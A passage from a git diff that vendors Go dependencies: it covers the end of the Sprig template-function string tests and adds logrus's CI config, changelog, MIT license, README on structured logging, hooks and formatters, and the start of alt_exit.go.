+ tests := []string{ + `{{if contains "cat" "fair catch"}}1{{end}}`, + `{{if hasPrefix "cat" "catch"}}1{{end}}`, + `{{if hasSuffix "cat" "ducat"}}1{{end}}`, + } + for _, tt := range tests { + if err := runt(tt, "1"); err != nil { + t.Error(err) + } + } +} + +func TestTrim(t *testing.T) { + tests := []string{ + `{{trim " 5.00 "}}`, + `{{trimAll "$" "$5.00$"}}`, + `{{trimPrefix "$" "$5.00"}}`, + `{{trimSuffix "$" "5.00$"}}`, + } + for _, tt := range tests { + if err := runt(tt, "5.00"); err != nil { + t.Error(err) + } + } +} + +func TestSplit(t *testing.T) { + tpl := `{{$v := "foo$bar$baz" | split "$"}}{{$v._0}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestToString(t *testing.T) { + tpl := `{{ toString 1 | kindOf }}` + assert.NoError(t, runt(tpl, "string")) +} + +func TestToStrings(t *testing.T) { + tpl := `{{ $s := list 1 2 3 | toStrings }}{{ index $s 1 | kindOf }}` + assert.NoError(t, runt(tpl, "string")) +} + +func TestJoin(t *testing.T) { + assert.NoError(t, runt(`{{ tuple "a" "b" "c" | join "-" }}`, "a-b-c")) + assert.NoError(t, runt(`{{ tuple 1 2 3 | join "-" }}`, "1-2-3")) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "a-b-c", map[string]interface{}{"V": []string{"a", "b", "c"}})) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "abc", map[string]interface{}{"V": "abc"})) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "1-2-3", map[string]interface{}{"V": []int{1, 2, 3}})) +} + +func TestSortAlpha(t *testing.T) { + // Named `append` in the function map + tests := map[string]string{ + `{{ list "c" "a" "b" | sortAlpha | join "" }}`: "abc", + `{{ list 2 1 4 3 | sortAlpha | join "" }}`: "1234", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestBase64EncodeDecode(t *testing.T) { + magicWord := "coffee" + expect := base64.StdEncoding.EncodeToString([]byte(magicWord)) + + if expect == magicWord { + t.Fatal("Encoder doesn't work.") + } + + tpl := `{{b64enc "coffee"}}` + if err := runt(tpl, 
expect); err != nil { + t.Error(err) + } + tpl = fmt.Sprintf("{{b64dec %q}}", expect) + if err := runt(tpl, magicWord); err != nil { + t.Error(err) + } +} +func TestBase32EncodeDecode(t *testing.T) { + magicWord := "coffee" + expect := base32.StdEncoding.EncodeToString([]byte(magicWord)) + + if expect == magicWord { + t.Fatal("Encoder doesn't work.") + } + + tpl := `{{b32enc "coffee"}}` + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + tpl = fmt.Sprintf("{{b32dec %q}}", expect) + if err := runt(tpl, magicWord); err != nil { + t.Error(err) + } +} + +func TestGoutils(t *testing.T) { + tests := map[string]string{ + `{{abbrev 5 "hello world"}}`: "he...", + `{{abbrevboth 5 10 "1234 5678 9123"}}`: "...5678...", + `{{nospace "h e l l o "}}`: "hello", + `{{untitle "First Try"}}`: "first try", //https://youtu.be/44-RsrF_V_w + `{{initials "First Try"}}`: "FT", + `{{wrap 5 "Hello World"}}`: "Hello\nWorld", + `{{wrapWith 5 "\t" "Hello World"}}`: "Hello\tWorld", + } + for k, v := range tests { + t.Log(k) + if err := runt(k, v); err != nil { + t.Errorf("Error on tpl %q: %s", k, err) + } + } +} + +func TestRandom(t *testing.T) { + // One of the things I love about Go: + goutils.RANDOM = rand.New(rand.NewSource(1)) + + // Because we're using a random number generator, we need these to go in + // a predictable sequence: + if err := runt(`{{randAlphaNum 5}}`, "9bzRv"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randAlpha 5}}`, "VjwGe"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randAscii 5}}`, "1KA5p"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randNumeric 5}}`, "26018"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + +} + +func TestCat(t *testing.T) { + tpl := `{{$b := "b"}}{{"c" | cat "a" $b}}` + if err := runt(tpl, "a b c"); err != nil { + t.Error(err) + } +} + +func TestIndent(t *testing.T) { + tpl := `{{indent 4 "a\nb\nc"}}` + if err := runt(tpl, " a\n b\n c"); err 
!= nil { + t.Error(err) + } +} + +func TestNindent(t *testing.T) { + tpl := `{{nindent 4 "a\nb\nc"}}` + if err := runt(tpl, "\n a\n b\n c"); err != nil { + t.Error(err) + } +} + +func TestReplace(t *testing.T) { + tpl := `{{"I Am Henry VIII" | replace " " "-"}}` + if err := runt(tpl, "I-Am-Henry-VIII"); err != nil { + t.Error(err) + } +} + +func TestPlural(t *testing.T) { + tpl := `{{$num := len "two"}}{{$num}} {{$num | plural "1 char" "chars"}}` + if err := runt(tpl, "3 chars"); err != nil { + t.Error(err) + } + tpl = `{{len "t" | plural "cheese" "%d chars"}}` + if err := runt(tpl, "cheese"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/Sirupsen/logrus/.gitignore new file mode 100644 index 0000000000..66be63a005 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/.gitignore @@ -0,0 +1 @@ +logrus diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/Sirupsen/logrus/.travis.yml new file mode 100644 index 0000000000..a23296a53b --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/.travis.yml @@ -0,0 +1,15 @@ +language: go +go: + - 1.6.x + - 1.7.x + - 1.8.x + - tip +env: + - GOMAXPROCS=4 GORACE=halt_on_error=1 +install: + - go get github.com/stretchr/testify/assert + - go get gopkg.in/gemnasium/logrus-airbrake-hook.v2 + - go get golang.org/x/sys/unix + - go get golang.org/x/sys/windows +script: + - go test -race -v ./... 
diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md new file mode 100644 index 0000000000..1bd1deb294 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md @@ -0,0 +1,123 @@ +# 1.0.5 + +* Fix hooks race (#707) +* Fix panic deadlock (#695) + +# 1.0.4 + +* Fix race when adding hooks (#612) +* Fix terminal check in AppEngine (#635) + +# 1.0.3 + +* Replace example files with testable examples + +# 1.0.2 + +* bug: quote non-string values in text formatter (#583) +* Make (*Logger) SetLevel a public method + +# 1.0.1 + +* bug: fix escaping in text formatter (#575) + +# 1.0.0 + +* Officially changed name to lower-case +* bug: colors on Windows 10 (#541) +* bug: fix race in accessing level (#512) + +# 0.11.5 + +* feature: add writer and writerlevel to entry (#372) + +# 0.11.4 + +* bug: fix undefined variable on solaris (#493) + +# 0.11.3 + +* formatter: configure quoting of empty values (#484) +* formatter: configure quoting character (default is `"`) (#484) +* bug: fix not importing io correctly in non-linux environments (#481) + +# 0.11.2 + +* bug: fix windows terminal detection (#476) + +# 0.11.1 + +* bug: fix tty detection with custom out (#471) + +# 0.11.0 + +* performance: Use bufferpool to allocate (#370) +* terminal: terminal detection for app-engine (#343) +* feature: exit handler (#375) + +# 0.10.0 + +* feature: Add a test hook (#180) +* feature: `ParseLevel` is now case-insensitive (#326) +* feature: `FieldLogger` interface that generalizes `Logger` and `Entry` (#308) +* performance: avoid re-allocations on `WithFields` (#335) + +# 0.9.0 + +* logrus/text_formatter: don't emit empty msg +* logrus/hooks/airbrake: move out of main repository +* logrus/hooks/sentry: move out of main repository +* logrus/hooks/papertrail: move out of main repository +* logrus/hooks/bugsnag: move out of main repository +* logrus/core: run tests with `-race` +* logrus/core: detect TTY based on `stderr` +* logrus/core: 
support `WithError` on logger +* logrus/core: Solaris support + +# 0.8.7 + +* logrus/core: fix possible race (#216) +* logrus/doc: small typo fixes and doc improvements + + +# 0.8.6 + +* hooks/raven: allow passing an initialized client + +# 0.8.5 + +* logrus/core: revert #208 + +# 0.8.4 + +* formatter/text: fix data race (#218) + +# 0.8.3 + +* logrus/core: fix entry log level (#208) +* logrus/core: improve performance of text formatter by 40% +* logrus/core: expose `LevelHooks` type +* logrus/core: add support for DragonflyBSD and NetBSD +* formatter/text: print structs more verbosely + +# 0.8.2 + +* logrus: fix more Fatal family functions + +# 0.8.1 + +* logrus: fix not exiting on `Fatalf` and `Fatalln` + +# 0.8.0 + +* logrus: defaults to stderr instead of stdout +* hooks/sentry: add special field for `*http.Request` +* formatter/text: ignore Windows for colors + +# 0.7.3 + +* formatter/\*: allow configuration of timestamp layout + +# 0.7.2 + +* formatter/text: Add configuration option for time format (#158) diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE b/vendor/github.com/Sirupsen/logrus/LICENSE new file mode 100644 index 0000000000..f090cb42f3 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2014 Simon Eskildsen + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. 
+ +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/Sirupsen/logrus/README.md new file mode 100644 index 0000000000..f77819b168 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/README.md @@ -0,0 +1,511 @@ +# Logrus :walrus: [![Build Status](https://travis-ci.org/sirupsen/logrus.svg?branch=master)](https://travis-ci.org/sirupsen/logrus) [![GoDoc](https://godoc.org/github.com/sirupsen/logrus?status.svg)](https://godoc.org/github.com/sirupsen/logrus) + +Logrus is a structured logger for Go (golang), completely API compatible with +the standard library logger. + +**Seeing weird case-sensitive problems?** It's in the past been possible to +import Logrus as both upper- and lower-case. Due to the Go package environment, +this caused issues in the community and we needed a standard. Some environments +experienced problems with the upper-case variant, so the lower-case was decided. +Everything using `logrus` will need to use the lower-case: +`github.com/sirupsen/logrus`. Any package that isn't, should be changed. + +To fix Glide, see [these +comments](https://github.com/sirupsen/logrus/issues/553#issuecomment-306591437). +For an in-depth explanation of the casing issue, see [this +comment](https://github.com/sirupsen/logrus/issues/570#issuecomment-313933276). + +**Are you interested in assisting in maintaining Logrus?** Currently I have a +lot of obligations, and I am unable to provide Logrus with the maintainership it +needs. 
If you'd like to help, please reach out to me at `simon at author's +username dot com`. + +Nicely color-coded in development (when a TTY is attached, otherwise just +plain text): + +![Colored](http://i.imgur.com/PY7qMwd.png) + +With `log.SetFormatter(&log.JSONFormatter{})`, for easy parsing by logstash +or Splunk: + +```json +{"animal":"walrus","level":"info","msg":"A group of walrus emerges from the +ocean","size":10,"time":"2014-03-10 19:57:38.562264131 -0400 EDT"} + +{"level":"warning","msg":"The group's number increased tremendously!", +"number":122,"omg":true,"time":"2014-03-10 19:57:38.562471297 -0400 EDT"} + +{"animal":"walrus","level":"info","msg":"A giant walrus appears!", +"size":10,"time":"2014-03-10 19:57:38.562500591 -0400 EDT"} + +{"animal":"walrus","level":"info","msg":"Tremendously sized cow enters the ocean.", +"size":9,"time":"2014-03-10 19:57:38.562527896 -0400 EDT"} + +{"level":"fatal","msg":"The ice breaks!","number":100,"omg":true, +"time":"2014-03-10 19:57:38.562543128 -0400 EDT"} +``` + +With the default `log.SetFormatter(&log.TextFormatter{})` when a TTY is not +attached, the output is compatible with the +[logfmt](http://godoc.org/github.com/kr/logfmt) format: + +```text +time="2015-03-26T01:27:38-04:00" level=debug msg="Started observing beach" animal=walrus number=8 +time="2015-03-26T01:27:38-04:00" level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 +time="2015-03-26T01:27:38-04:00" level=warning msg="The group's number increased tremendously!" number=122 omg=true +time="2015-03-26T01:27:38-04:00" level=debug msg="Temperature changes" temperature=-4 +time="2015-03-26T01:27:38-04:00" level=panic msg="It's over 9000!" animal=orca size=9009 +time="2015-03-26T01:27:38-04:00" level=fatal msg="The ice breaks!" 
err=&{0x2082280c0 map[animal:orca size:9009] 2015-03-26 01:27:38.441574009 -0400 EDT panic It's over 9000!} number=100 omg=true +exit status 1 +``` + +#### Case-sensitivity + +The organization's name was changed to lower-case--and this will not be changed +back. If you are getting import conflicts due to case sensitivity, please use +the lower-case import: `github.com/sirupsen/logrus`. + +#### Example + +The simplest way to use Logrus is simply the package-level exported logger: + +```go +package main + +import ( + log "github.com/sirupsen/logrus" +) + +func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + }).Info("A walrus appears") +} +``` + +Note that it's completely api-compatible with the stdlib logger, so you can +replace your `log` imports everywhere with `log "github.com/sirupsen/logrus"` +and you'll now have the flexibility of Logrus. You can customize it all you +want: + +```go +package main + +import ( + "os" + log "github.com/sirupsen/logrus" +) + +func init() { + // Log as JSON instead of the default ASCII formatter. + log.SetFormatter(&log.JSONFormatter{}) + + // Output to stdout instead of the default stderr + // Can be any io.Writer, see below for File example + log.SetOutput(os.Stdout) + + // Only log the warning severity or above. 
+ log.SetLevel(log.WarnLevel) +} + +func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(log.Fields{ + "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(log.Fields{ + "omg": true, + "number": 100, + }).Fatal("The ice breaks!") + + // A common pattern is to re-use fields between logging statements by re-using + // the logrus.Entry returned from WithFields() + contextLogger := log.WithFields(log.Fields{ + "common": "this is a common field", + "other": "I also should be logged always", + }) + + contextLogger.Info("I'll be logged with common and other field") + contextLogger.Info("Me too") +} +``` + +For more advanced usage such as logging to multiple locations from the same +application, you can also create an instance of the `logrus` Logger: + +```go +package main + +import ( + "os" + "github.com/sirupsen/logrus" +) + +// Create a new instance of the logger. You can have any number of instances. +var log = logrus.New() + +func main() { + // The API for setting attributes is a little different than the package level + // exported logger. See Godoc. + log.Out = os.Stdout + + // You could set this to any `io.Writer` such as a file + // file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666) + // if err == nil { + // log.Out = file + // } else { + // log.Info("Failed to log to file, using default stderr") + // } + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") +} +``` + +#### Fields + +Logrus encourages careful, structured logging through logging fields instead of +long, unparseable error messages. 
For example, instead of: `log.Fatalf("Failed +to send event %s to topic %s with key %d")`, you should log the much more +discoverable: + +```go +log.WithFields(log.Fields{ + "event": event, + "topic": topic, + "key": key, +}).Fatal("Failed to send event") +``` + +We've found this API forces you to think about logging in a way that produces +much more useful logging messages. We've been in countless situations where just +a single added field to a log statement that was already there would've saved us +hours. The `WithFields` call is optional. + +In general, with Logrus using any of the `printf`-family functions should be +seen as a hint you should add a field, however, you can still use the +`printf`-family functions with Logrus. + +#### Default Fields + +Often it's helpful to have fields _always_ attached to log statements in an +application or parts of one. For example, you may want to always log the +`request_id` and `user_ip` in the context of a request. Instead of writing +`log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip})` on +every line, you can create a `logrus.Entry` to pass around instead: + +```go +requestLogger := log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip}) +requestLogger.Info("something happened on that request") # will log request_id and user_ip +requestLogger.Warn("something not great happened") +``` + +#### Hooks + +You can add hooks for logging levels. For example to send errors to an exception +tracking service on `Error`, `Fatal` and `Panic`, info to StatsD or log to +multiple places simultaneously, e.g. syslog. + +Logrus comes with [built-in hooks](hooks/). 
Add those, or your custom hook, in +`init`: + +```go +import ( + log "github.com/sirupsen/logrus" + "gopkg.in/gemnasium/logrus-airbrake-hook.v2" // the package is named "airbrake" + logrus_syslog "github.com/sirupsen/logrus/hooks/syslog" + "log/syslog" +) + +func init() { + + // Use the Airbrake hook to report errors that have Error severity or above to + // an exception tracker. You can create custom hooks, see the Hooks section. + log.AddHook(airbrake.NewHook(123, "xyz", "production")) + + hook, err := logrus_syslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + if err != nil { + log.Error("Unable to connect to local syslog daemon") + } else { + log.AddHook(hook) + } +} +``` +Note: Syslog hook also support connecting to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). For the detail, please check the [syslog hook README](hooks/syslog/README.md). + +| Hook | Description | +| ----- | ----------- | +| [Airbrake "legacy"](https://github.com/gemnasium/logrus-airbrake-legacy-hook) | Send errors to an exception tracking service compatible with the Airbrake API V2. Uses [`airbrake-go`](https://github.com/tobi/airbrake-go) behind the scenes. | +| [Airbrake](https://github.com/gemnasium/logrus-airbrake-hook) | Send errors to the Airbrake API V3. Uses the official [`gobrake`](https://github.com/airbrake/gobrake) behind the scenes. 
| +| [Amazon Kinesis](https://github.com/evalphobia/logrus_kinesis) | Hook for logging to [Amazon Kinesis](https://aws.amazon.com/kinesis/) | +| [Amqp-Hook](https://github.com/vladoatanasov/logrus_amqp) | Hook for logging to Amqp broker (Like RabbitMQ) | +| [Application Insights](https://github.com/jjcollinge/logrus-appinsights) | Hook for logging to [Application Insights](https://azure.microsoft.com/en-us/services/application-insights/) +| [AzureTableHook](https://github.com/kpfaulkner/azuretablehook/) | Hook for logging to Azure Table Storage| +| [Bugsnag](https://github.com/Shopify/logrus-bugsnag/blob/master/bugsnag.go) | Send errors to the Bugsnag exception tracking service. | +| [DeferPanic](https://github.com/deferpanic/dp-logrus) | Hook for logging to DeferPanic | +| [Discordrus](https://github.com/kz/discordrus) | Hook for logging to [Discord](https://discordapp.com/) | +| [ElasticSearch](https://github.com/sohlich/elogrus) | Hook for logging to ElasticSearch| +| [Firehose](https://github.com/beaubrewer/logrus_firehose) | Hook for logging to [Amazon Firehose](https://aws.amazon.com/kinesis/firehose/) +| [Fluentd](https://github.com/evalphobia/logrus_fluent) | Hook for logging to fluentd | +| [Go-Slack](https://github.com/multiplay/go-slack) | Hook for logging to [Slack](https://slack.com) | +| [Graylog](https://github.com/gemnasium/logrus-graylog-hook) | Hook for logging to [Graylog](http://graylog2.org/) | +| [Hiprus](https://github.com/nubo/hiprus) | Send errors to a channel in hipchat. 
| +| [Honeybadger](https://github.com/agonzalezro/logrus_honeybadger) | Hook for sending exceptions to Honeybadger | +| [InfluxDB](https://github.com/Abramovic/logrus_influxdb) | Hook for logging to influxdb | +| [Influxus](http://github.com/vlad-doru/influxus) | Hook for concurrently logging to [InfluxDB](http://influxdata.com/) | +| [Journalhook](https://github.com/wercker/journalhook) | Hook for logging to `systemd-journald` | +| [KafkaLogrus](https://github.com/tracer0tong/kafkalogrus) | Hook for logging to Kafka | +| [Kafka REST Proxy](https://github.com/Nordstrom/logrus-kafka-rest-proxy) | Hook for logging to [Kafka REST Proxy](https://docs.confluent.io/current/kafka-rest/docs) | +| [LFShook](https://github.com/rifflock/lfshook) | Hook for logging to the local filesystem | +| [Logbeat](https://github.com/macandmia/logbeat) | Hook for logging to [Opbeat](https://opbeat.com/) | +| [Logentries](https://github.com/jcftang/logentriesrus) | Hook for logging to [Logentries](https://logentries.com/) | +| [Logentrus](https://github.com/puddingfactory/logentrus) | Hook for logging to [Logentries](https://logentries.com/) | +| [Logmatic.io](https://github.com/logmatic/logmatic-go) | Hook for logging to [Logmatic.io](http://logmatic.io/) | +| [Logrusly](https://github.com/sebest/logrusly) | Send logs to [Loggly](https://www.loggly.com/) | +| [Logstash](https://github.com/bshuster-repo/logrus-logstash-hook) | Hook for logging to [Logstash](https://www.elastic.co/products/logstash) | +| [Mail](https://github.com/zbindenren/logrus_mail) | Hook for sending exceptions via mail | +| [Mattermost](https://github.com/shuLhan/mattermost-integration/tree/master/hooks/logrus) | Hook for logging to [Mattermost](https://mattermost.com/) | +| [Mongodb](https://github.com/weekface/mgorus) | Hook for logging to mongodb | +| [NATS-Hook](https://github.com/rybit/nats_logrus_hook) | Hook for logging to [NATS](https://nats.io) | +| 
[Octokit](https://github.com/dorajistyle/logrus-octokit-hook) | Hook for logging to github via octokit | +| [Papertrail](https://github.com/polds/logrus-papertrail-hook) | Send errors to the [Papertrail](https://papertrailapp.com) hosted logging service via UDP. | +| [PostgreSQL](https://github.com/gemnasium/logrus-postgresql-hook) | Send logs to [PostgreSQL](http://postgresql.org) | +| [Promrus](https://github.com/weaveworks/promrus) | Expose number of log messages as [Prometheus](https://prometheus.io/) metrics | +| [Pushover](https://github.com/toorop/logrus_pushover) | Send error via [Pushover](https://pushover.net) | +| [Raygun](https://github.com/squirkle/logrus-raygun-hook) | Hook for logging to [Raygun.io](http://raygun.io/) | +| [Redis-Hook](https://github.com/rogierlommers/logrus-redis-hook) | Hook for logging to a ELK stack (through Redis) | +| [Rollrus](https://github.com/heroku/rollrus) | Hook for sending errors to rollbar | +| [Scribe](https://github.com/sagar8192/logrus-scribe-hook) | Hook for logging to [Scribe](https://github.com/facebookarchive/scribe)| +| [Sentry](https://github.com/evalphobia/logrus_sentry) | Send errors to the Sentry error logging and aggregation service. | +| [Slackrus](https://github.com/johntdyer/slackrus) | Hook for Slack chat. | +| [Stackdriver](https://github.com/knq/sdhook) | Hook for logging to [Google Stackdriver](https://cloud.google.com/logging/) | +| [Sumorus](https://github.com/doublefree/sumorus) | Hook for logging to [SumoLogic](https://www.sumologic.com/)| +| [Syslog](https://github.com/sirupsen/logrus/blob/master/hooks/syslog/syslog.go) | Send errors to remote syslog server. Uses standard library `log/syslog` behind the scenes. | +| [Syslog TLS](https://github.com/shinji62/logrus-syslog-ng) | Send errors to remote syslog server with TLS support. 
| +| [Telegram](https://github.com/rossmcdonald/telegram_hook) | Hook for logging errors to [Telegram](https://telegram.org/) | +| [TraceView](https://github.com/evalphobia/logrus_appneta) | Hook for logging to [AppNeta TraceView](https://www.appneta.com/products/traceview/) | +| [Typetalk](https://github.com/dragon3/logrus-typetalk-hook) | Hook for logging to [Typetalk](https://www.typetalk.in/) | +| [logz.io](https://github.com/ripcurld00d/logrus-logzio-hook) | Hook for logging to [logz.io](https://logz.io), a Log as a Service using Logstash | +| [SQS-Hook](https://github.com/tsarpaul/logrus_sqs) | Hook for logging to [Amazon Simple Queue Service (SQS)](https://aws.amazon.com/sqs/) | + +#### Level logging + +Logrus has six logging levels: Debug, Info, Warning, Error, Fatal and Panic. + +```go +log.Debug("Useful debugging information.") +log.Info("Something noteworthy happened!") +log.Warn("You should probably take a look at this.") +log.Error("Something failed but I'm not quitting.") +// Calls os.Exit(1) after logging +log.Fatal("Bye.") +// Calls panic() after logging +log.Panic("I'm bailing.") +``` + +You can set the logging level on a `Logger`, then it will only log entries with +that severity or anything above it: + +```go +// Will log anything that is info or above (warn, error, fatal, panic). Default. +log.SetLevel(log.InfoLevel) +``` + +It may be useful to set `log.Level = logrus.DebugLevel` in a debug or verbose +environment if your application has that. + +#### Entries + +Besides the fields added with `WithField` or `WithFields` some fields are +automatically added to all logging events: + +1. `time`. The timestamp when the entry was created. +2. `msg`. The logging message passed to `{Info,Warn,Error,Fatal,Panic}` after + the `AddFields` call. E.g. `Failed to send event.` +3. `level`. The logging level. E.g. `info`. + +#### Environments + +Logrus has no notion of environment. 
+ +If you wish for hooks and formatters to only be used in specific environments, +you should handle that yourself. For example, if your application has a global +variable `Environment`, which is a string representation of the environment you +could do: + +```go +import ( + log "github.com/sirupsen/logrus" +) + +init() { + // do something here to set environment depending on an environment variable + // or command-line flag + if Environment == "production" { + log.SetFormatter(&log.JSONFormatter{}) + } else { + // The TextFormatter is default, you don't actually have to do this. + log.SetFormatter(&log.TextFormatter{}) + } +} +``` + +This configuration is how `logrus` was intended to be used, but JSON in +production is mostly only useful if you do log aggregation with tools like +Splunk or Logstash. + +#### Formatters + +The built-in logging formatters are: + +* `logrus.TextFormatter`. Logs the event in colors if stdout is a tty, otherwise + without colors. + * *Note:* to force colored output when there is no TTY, set the `ForceColors` + field to `true`. To force no colored output even if there is a TTY set the + `DisableColors` field to `true`. For Windows, see + [github.com/mattn/go-colorable](https://github.com/mattn/go-colorable). + * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#TextFormatter). +* `logrus.JSONFormatter`. Logs fields as JSON. + * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#JSONFormatter). + +Third party logging formatters: + +* [`FluentdFormatter`](https://github.com/joonix/log). Formats entries that can be parsed by Kubernetes and Google Container Engine. +* [`logstash`](https://github.com/bshuster-repo/logrus-logstash-hook). Logs fields as [Logstash](http://logstash.net) Events. +* [`prefixed`](https://github.com/x-cray/logrus-prefixed-formatter). Displays log entry source along with alternative layout. 
+* [`zalgo`](https://github.com/aybabtme/logzalgo). Invoking the P͉̫o̳̼̊w̖͈̰͎e̬͔̭͂r͚̼̹̲ ̫͓͉̳͈ō̠͕͖̚f̝͍̠ ͕̲̞͖͑Z̖̫̤̫ͪa͉̬͈̗l͖͎g̳̥o̰̥̅!̣͔̲̻͊̄ ̙̘̦̹̦. + +You can define your formatter by implementing the `Formatter` interface, +requiring a `Format` method. `Format` takes an `*Entry`. `entry.Data` is a +`Fields` type (`map[string]interface{}`) with all your fields as well as the +default ones (see Entries section above): + +```go +type MyJSONFormatter struct { +} + +log.SetFormatter(new(MyJSONFormatter)) + +func (f *MyJSONFormatter) Format(entry *Entry) ([]byte, error) { + // Note this doesn't include Time, Level and Message which are available on + // the Entry. Consult `godoc` on information about those fields or read the + // source of the official loggers. + serialized, err := json.Marshal(entry.Data) + if err != nil { + return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err) + } + return append(serialized, '\n'), nil +} +``` + +#### Logger as an `io.Writer` + +Logrus can be transformed into an `io.Writer`. That writer is the end of an `io.Pipe` and it is your responsibility to close it. + +```go +w := logger.Writer() +defer w.Close() + +srv := http.Server{ + // create a stdlib log.Logger that writes to + // logrus.Logger. + ErrorLog: log.New(w, "", 0), +} +``` + +Each line written to that writer will be printed the usual way, using formatters +and hooks. The level for those entries is `info`. + +This means that we can override the standard library logger easily: + +```go +logger := logrus.New() +logger.Formatter = &logrus.JSONFormatter{} + +// Use logrus for standard log output +// Note that `log` here references stdlib's log +// Not logrus imported under the name `log`. +log.SetOutput(logger.Writer()) +``` + +#### Rotation + +Log rotation is not provided with Logrus. Log rotation should be done by an +external program (like `logrotate(8)`) that can compress and delete old log +entries. It should not be a feature of the application-level logger. 
+ +#### Tools + +| Tool | Description | +| ---- | ----------- | +|[Logrus Mate](https://github.com/gogap/logrus_mate)|Logrus mate is a tool for Logrus to manage loggers, you can initial logger's level, hook and formatter by config file, the logger will generated with different config at different environment.| +|[Logrus Viper Helper](https://github.com/heirko/go-contrib/tree/master/logrusHelper)|An Helper around Logrus to wrap with spf13/Viper to load configuration with fangs! And to simplify Logrus configuration use some behavior of [Logrus Mate](https://github.com/gogap/logrus_mate). [sample](https://github.com/heirko/iris-contrib/blob/master/middleware/logrus-logger/example) | + +#### Testing + +Logrus has a built in facility for asserting the presence of log messages. This is implemented through the `test` hook and provides: + +* decorators for existing logger (`test.NewLocal` and `test.NewGlobal`) which basically just add the `test` hook +* a test logger (`test.NewNullLogger`) that just records log messages (and does not output any): + +```go +import( + "github.com/sirupsen/logrus" + "github.com/sirupsen/logrus/hooks/test" + "github.com/stretchr/testify/assert" + "testing" +) + +func TestSomething(t*testing.T){ + logger, hook := test.NewNullLogger() + logger.Error("Helloerror") + + assert.Equal(t, 1, len(hook.Entries)) + assert.Equal(t, logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal(t, "Helloerror", hook.LastEntry().Message) + + hook.Reset() + assert.Nil(t, hook.LastEntry()) +} +``` + +#### Fatal handlers + +Logrus can register one or more functions that will be called when any `fatal` +level message is logged. The registered handlers will be executed before +logrus performs a `os.Exit(1)`. This behavior may be helpful if callers need +to gracefully shutdown. Unlike a `panic("Something went wrong...")` call which can be intercepted with a deferred `recover` a call to `os.Exit(1)` can not be intercepted. + +``` +... 
+handler := func() { + // gracefully shutdown something... +} +logrus.RegisterExitHandler(handler) +... +``` + +#### Thread safety + +By default Logger is protected by mutex for concurrent writes, this mutex is invoked when calling hooks and writing logs. +If you are sure such locking is not needed, you can call logger.SetNoLock() to disable the locking. + +Situation when locking is not needed includes: + +* You have no hooks registered, or hooks calling is already thread-safe. + +* Writing to logger.Out is already thread-safe, for example: + + 1) logger.Out is protected by locks. + + 2) logger.Out is a os.File handler opened with `O_APPEND` flag, and every write is smaller than 4k. (This allow multi-thread/multi-process writing) + + (Refer to http://www.notthewizard.com/2014/06/17/are-files-appends-really-atomic/) diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/Sirupsen/logrus/alt_exit.go new file mode 100644 index 0000000000..8af90637a9 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/alt_exit.go @@ -0,0 +1,64 @@ +package logrus + +// The following code was sourced and modified from the +// https://github.com/tebeka/atexit package governed by the following license: +// +// Copyright (c) 2012 Miki Tebeka . +// +// Permission is hereby granted, free of charge, to any person obtaining a copy of +// this software and associated documentation files (the "Software"), to deal in +// the Software without restriction, including without limitation the rights to +// use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +// the Software, and to permit persons to whom the Software is furnished to do so, +// 